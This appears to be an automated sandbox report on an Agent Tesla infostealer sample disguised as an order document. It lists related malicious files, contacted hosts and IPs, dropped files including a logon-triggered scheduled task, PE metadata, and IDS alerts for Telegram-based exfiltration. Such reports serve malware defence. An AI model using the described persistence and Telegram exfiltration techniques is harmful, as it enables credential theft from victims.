	DHL Special Clearance Fees 01012022_sg.exe	Get hash	malicious	Browse	api.ipify.org/
	Documento contrattuale 22201008 Spec22201009.exe	Get hash	malicious	Browse	api.ipify.org/
	na.exe	Get hash	malicious	Browse	api.ipify.org/
	ConsoleApp8.exe	Get hash	malicious	Browse	api.ipify.org/
	if.bin.dll	Get hash	malicious	Browse	api.ipify.org/
	D1768Y2157.doc	Get hash	malicious	Browse	api.ipify.org/
	gSbSxwWtqG.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	gPZ7cR9v89.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	mixshop_20211229-065147.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	iff.bin.dll	Get hash	malicious	Browse	api.ipify.org/
	SecuriteInfo.com.Heur.31820.doc	Get hash	malicious	Browse	api.ipify.org/
	229C7DF4.doc	Get hash	malicious	Browse	api.ipify.org/
	0617_1876522156924.doc	Get hash	malicious	Browse	api.ipify.org/
	Whrw7Kmlni.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api.ipify.org.herokudns.com	b861f2ee7472af453fac1c50c3fc4036.exe	Get hash	malicious	Browse	54.91.59.199
	SecuriteInfo.com.Win32.CrypterX-gen.29420.19164.exe	Get hash	malicious	Browse	54.91.59.199
	Swift confirmation copy.exe	Get hash	malicious	Browse	52.20.78.240
	PI No.7861612.pif.exe	Get hash	malicious	Browse	52.20.78.240
	SH-765433_pdf.exe	Get hash	malicious	Browse	3.232.242.170
	PO 0017709220.pdf (68KB).exe	Get hash	malicious	Browse	3.220.57.224
	PAYMENT ADVICE 2022-06-12.exe	Get hash	malicious	Browse	3.220.57.224
	wUPIJcl00e.exe	Get hash	malicious	Browse	54.91.59.199
	SOA.exe	Get hash	malicious	Browse	3.220.57.224
	invoice4446575.doc	Get hash	malicious	Browse	3.220.57.224
	UD6pLpOGgw.exe	Get hash	malicious	Browse	3.232.242.170
	SS023297 TUBLOROM S.R.L.vbs	Get hash	malicious	Browse	3.232.242.170
	Reftt120620025523.vbe	Get hash	malicious	Browse	52.20.78.240
	validation- OFFICE 365.htm	Get hash	malicious	Browse	54.91.59.199
	SOA.exe	Get hash	malicious	Browse	54.91.59.199
	New_PO #1783919939-12-2022 RFQ Amended.exe	Get hash	malicious	Browse	3.232.242.170
	SecuriteInfo.com.Win32.CrypterX-gen.9890.26534.exe	Get hash	malicious	Browse	52.20.78.240
	SOA.exe	Get hash	malicious	Browse	3.232.242.170
	Payment Confirmation $32,235.45 ACH-101431.htm	Get hash	malicious	Browse	3.232.242.170
	payment copy.pdf.exe	Get hash	malicious	Browse	3.220.57.224
api.telegram.org	b861f2ee7472af453fac1c50c3fc4036.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Win32.PWSX-gen.31371.23237.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Troj.Krypt-TF.20337.6044.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Garf.Gen.7.21386.6564.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Win64.PWSX-gen.8563.27113.exe	Get hash	malicious	Browse	149.154.167.220
	PI No.7861612.pif.exe	Get hash	malicious	Browse	149.154.167.220
	SH-765433_pdf.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan-Dropper.MSIL.Agent.5276.27672.exe	Get hash	malicious	Browse	149.154.167.220
	Quotation required.exe	Get hash	malicious	Browse	149.154.167.220
	PO 0017709220.pdf (68KB).exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.PackedNET.1725.2046.4085.exe	Get hash	malicious	Browse	149.154.167.220
	filmora_setup.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.PackedNET.1725.7607.10943.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.PackedNET.1725.19553.28086.exe	Get hash	malicious	Browse	149.154.167.220
	GIBI.exe	Get hash	malicious	Browse	149.154.167.220
	wUPIJcl00e.exe	Get hash	malicious	Browse	149.154.167.220
	SOA.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Win32.RATX-gen.27343.27281.exe	Get hash	malicious	Browse	149.154.167.220
	OmF3SQZApu.exe	Get hash	malicious	Browse	149.154.167.220
	SOA.exe	Get hash	malicious	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEGRAMRU	b861f2ee7472af453fac1c50c3fc4036.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Win32.PWSX-gen.31371.23237.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Troj.Krypt-TF.20337.6044.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Garf.Gen.7.21386.6564.exe	Get hash	malicious	Browse	149.154.167.220
	file.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.Win64.PWSX-gen.8563.27113.exe	Get hash	malicious	Browse	149.154.167.220
	PI No.7861612.pif.exe	Get hash	malicious	Browse	149.154.167.220
	SH-765433_pdf.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan-Dropper.MSIL.Agent.5276.27672.exe	Get hash	malicious	Browse	149.154.167.220
	Quotation required.exe	Get hash	malicious	Browse	149.154.167.220
	PO 0017709220.pdf (68KB).exe	Get hash	malicious	Browse	149.154.167.220
	setup.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.Trojan.PackedNET.1725.2046.4085.exe	Get hash	malicious	Browse	149.154.167.220
	filmora_setup.exe	Get hash	malicious	Browse	149.154.167.220
	Unl#U0443m_Ve_rssi#U043en.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.Trojan.PackedNET.1725.7607.10943.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.PackedNET.1725.19553.28086.exe	Get hash	malicious	Browse	149.154.167.220
	SoftwareSetupFile.exe	Get hash	malicious	Browse	149.154.167.99
	Unl#U0443m_Ve_rssi#U043en.exe	Get hash	malicious	Browse	149.154.167.99
	SetupLauncher..exe	Get hash	malicious	Browse	149.154.167.99
AMAZON-AESUS	b861f2ee7472af453fac1c50c3fc4036.exe	Get hash	malicious	Browse	3.220.57.224
	SecuriteInfo.com.Win32.CrypterX-gen.29420.19164.exe	Get hash	malicious	Browse	54.91.59.199
	MO0Cyr6H4J.elf	Get hash	malicious	Browse	54.54.36.184
	https://survey.us.confirmit.com/wix/p3083813725.aspx?__sid__=HjEn4YmRtcswIiiAf5YafF7VkUaszOHJEog9MoIorEYYvt0pZ_4EHHdPVTZlaZV2Q_8F7BvA2zlXOsmZ3Mo4hw2	Get hash	malicious	Browse	34.200.97.200
	Swift confirmation copy.exe	Get hash	malicious	Browse	52.20.78.240
	PI No.7861612.pif.exe	Get hash	malicious	Browse	52.20.78.240
	SH-765433_pdf.exe	Get hash	malicious	Browse	3.232.242.170
	https://drkoljames.myportfolio.com/	Get hash	malicious	Browse	54.174.232.127
	https://npxone-1212a1.hub.arcgis.com/	Get hash	malicious	Browse	34.225.226.12
	PO 0017709220.pdf (68KB).exe	Get hash	malicious	Browse	52.20.78.240
	https://t.co/wP6sqCqYIh	Get hash	malicious	Browse	54.84.214.198
	https://lc3.shktrk.com/r/e/leBmmSL0GqOs6GEn7#gpeterson@ii-vi.com&010-9A	Get hash	malicious	Browse	34.239.5.157
	http___185.246.221.143_pl2.exe	Get hash	malicious	Browse	3.236.57.215
	PAYMENT ADVICE 2022-06-12.exe	Get hash	malicious	Browse	3.220.57.224
	wUPIJcl00e.exe	Get hash	malicious	Browse	54.91.59.199
	Y7bs6Iraea.elf	Get hash	malicious	Browse	54.42.88.250
	SOA.exe	Get hash	malicious	Browse	3.220.57.224
	invoice4446575.doc	Get hash	malicious	Browse	3.220.57.224
	UD6pLpOGgw.exe	Get hash	malicious	Browse	3.232.242.170
	https://rebrand.ly/w4i1gja?user=jerrym@dwotc.com	Get hash	malicious	Browse	54.237.146.211

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	b861f2ee7472af453fac1c50c3fc4036.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	Purchase Inquiry_pdf.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	SecuriteInfo.com.Win32.CrypterX-gen.29420.19164.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	SecuriteInfo.com.Win32.PWSX-gen.31371.23237.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	u4HZHFMv6E.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	u4HZHFMv6E.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	SecuriteInfo.com.Troj.Krypt-TF.20337.6044.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	SecuriteInfo.com.Win64.PWSX-gen.8563.27113.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	Swift confirmation copy.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	ConnectWiseControl.Client.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	PI No.7861612.pif.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	SH-765433_pdf.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	SecuriteInfo.com.Trojan-Dropper.MSIL.Agent.5276.27672.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	PO 0017709220.pdf (68KB).exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	Slzzmcysvci.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	SecuriteInfo.com.Trojan.PackedNET.1725.2046.4085.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	filmora_setup.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	SecuriteInfo.com.Trojan.PackedNET.1725.7607.10943.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	SecuriteInfo.com.Trojan.PackedNET.1725.19553.28086.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170
	PAYMENT ADVICE 2022-06-12.exe	Get hash	malicious	Browse	149.154.167.220 54.91.59.199 3.232.242.170

Process:	C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5:	69206D3AF7D6EFD08F4B4726998856D3
SHA1:	E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256:	A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512:	CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WsdnBq.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\WsdnBq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5:	69206D3AF7D6EFD08F4B4726998856D3
SHA1:	E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256:	A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512:	CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\tmp645E.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\WsdnBq.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1639
Entropy (8bit):	5.175860465839716
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGyYtn:cbhK79lNQR/rydbz9I3YODOLNdq3u
MD5:	0DBBF38DD1BB19DDB9D0C429955A1C4B
SHA1:	09B7CD25F4FBF6BD3EB74FF25BDA85A71B99C87E
SHA-256:	33B74500742DA6CCCF3FAB1A31DBD7953A5FB36C95EE25EF574839D96BB6D7C5
SHA-512:	6AE4FE4F7D63F604014A27AD1A59A8E8013D21A562B3025E656C2C1A5BB6C6FE1551F1B7F88B746A7D4BEBABDC023C2880377BD6B8DA13B5EB7EF74D34145FC1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Local\Temp\tmpF47D.tmp

Download File

Process:	C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1639
Entropy (8bit):	5.175860465839716
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGyYtn:cbhK79lNQR/rydbz9I3YODOLNdq3u
MD5:	0DBBF38DD1BB19DDB9D0C429955A1C4B
SHA1:	09B7CD25F4FBF6BD3EB74FF25BDA85A71B99C87E
SHA-256:	33B74500742DA6CCCF3FAB1A31DBD7953A5FB36C95EE25EF574839D96BB6D7C5
SHA-512:	6AE4FE4F7D63F604014A27AD1A59A8E8013D21A562B3025E656C2C1A5BB6C6FE1551F1B7F88B746A7D4BEBABDC023C2880377BD6B8DA13B5EB7EF74D34145FC1
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Roaming\WsdnBq.exe

Download File

Process:	C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	873472
Entropy (8bit):	7.665798175957009
Encrypted:	false
SSDEEP:	24576:F2ibxF1RKDbH8emeHmXlO3Qe5/uwg5+RAj:/xFqXHXmeOlO3QW/2e
MD5:	19081EF2A08F678A3203B29124043C41
SHA1:	E86ACEA06A600F170402A0C1020C25AC2550FFA0
SHA-256:	2F356283C209400C6385A24450F266B59477E035E9389C8D1AF4843CD1AD2374
SHA-512:	AAD284AE800F26F6D27A12EC66CD42C781861DE7FBD907B8C5B3938DC8FA343286B35E21A56C3680CC92E36D1857FB8F1FD53796F3A82BE182245493855FFA3F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 31%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.c..............P..J...........h... ........@.. ....................................@.................................\h..O....................................+..T............................................ ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................h......H.......T...p............................................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+..&..().......0..<........~.....(.....,!r...p.....(+...o,...s-............~.....+...0...........~.....+.."........0...........(....r-..p~....o.....+.....0..<........~.....(*.....,!r=..p.....(+

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.665798175957009
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	ORDER (6256 OS)#391 PI.exe
File size:	873472
MD5:	19081ef2a08f678a3203b29124043c41
SHA1:	e86acea06a600f170402a0c1020c25ac2550ffa0
SHA256:	2f356283c209400c6385a24450f266b59477e035e9389c8d1af4843cd1ad2374
SHA512:	aad284ae800f26f6d27a12ec66cd42c781861de7fbd907b8c5b3938dc8fa343286b35e21a56c3680cc92e36d1857fb8f1fd53796f3a82be182245493855ffa3f
SSDEEP:	24576:F2ibxF1RKDbH8emeHmXlO3Qe5/uwg5+RAj:/xFqXHXmeOlO3QW/2e
TLSH:	BC058BA773FB16E6C03492F4256063310EF1D62D89178731EF9458E89BA2A77C9E1732
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.c..............P..J...........h... ........@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x4d68ae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x63914A88 [Thu Dec 8 02:23:04 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd685c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd8000	0x5b4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xda000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xd2bd4	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xd48b4	0xd4a00	False	0.8199416244121105	data	7.6706447927786225	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xd8000	0x5b4	0x600	False	0.421875	data	4.115880835857526	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xda000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xd8090	0x324	data
RT_MANIFEST	0xd83c4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.4149.154.167.220496964432851779 12/09/22-10:19:40.984166	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49696	443	192.168.2.4	149.154.167.220
192.168.2.4149.154.167.220496984432851779 12/09/22-10:20:17.013980	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49698	443	192.168.2.4	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2022 10:19:22.698903084 CET	49695	443	192.168.2.4	3.232.242.170
Dec 9, 2022 10:19:22.698968887 CET	443	49695	3.232.242.170	192.168.2.4
Dec 9, 2022 10:19:22.699067116 CET	49695	443	192.168.2.4	3.232.242.170
Dec 9, 2022 10:19:22.772326946 CET	49695	443	192.168.2.4	3.232.242.170
Dec 9, 2022 10:19:22.772398949 CET	443	49695	3.232.242.170	192.168.2.4
Dec 9, 2022 10:19:23.034101963 CET	443	49695	3.232.242.170	192.168.2.4
Dec 9, 2022 10:19:23.034198046 CET	49695	443	192.168.2.4	3.232.242.170
Dec 9, 2022 10:19:23.039324045 CET	49695	443	192.168.2.4	3.232.242.170
Dec 9, 2022 10:19:23.039352894 CET	443	49695	3.232.242.170	192.168.2.4
Dec 9, 2022 10:19:23.039694071 CET	443	49695	3.232.242.170	192.168.2.4
Dec 9, 2022 10:19:23.219844103 CET	49695	443	192.168.2.4	3.232.242.170
Dec 9, 2022 10:19:24.152493000 CET	49695	443	192.168.2.4	3.232.242.170
Dec 9, 2022 10:19:24.152535915 CET	443	49695	3.232.242.170	192.168.2.4
Dec 9, 2022 10:19:24.271603107 CET	443	49695	3.232.242.170	192.168.2.4
Dec 9, 2022 10:19:24.271747112 CET	443	49695	3.232.242.170	192.168.2.4
Dec 9, 2022 10:19:24.271814108 CET	49695	443	192.168.2.4	3.232.242.170
Dec 9, 2022 10:19:24.275346994 CET	49695	443	192.168.2.4	3.232.242.170
Dec 9, 2022 10:19:40.860681057 CET	49696	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:19:40.860760927 CET	443	49696	149.154.167.220	192.168.2.4
Dec 9, 2022 10:19:40.860915899 CET	49696	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:19:40.861772060 CET	49696	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:19:40.861812115 CET	443	49696	149.154.167.220	192.168.2.4
Dec 9, 2022 10:19:40.937942982 CET	443	49696	149.154.167.220	192.168.2.4
Dec 9, 2022 10:19:40.938097954 CET	49696	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:19:40.942301035 CET	49696	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:19:40.942333937 CET	443	49696	149.154.167.220	192.168.2.4
Dec 9, 2022 10:19:40.942708969 CET	443	49696	149.154.167.220	192.168.2.4
Dec 9, 2022 10:19:40.944998980 CET	49696	443	192.168.2.4	149.154.167.220
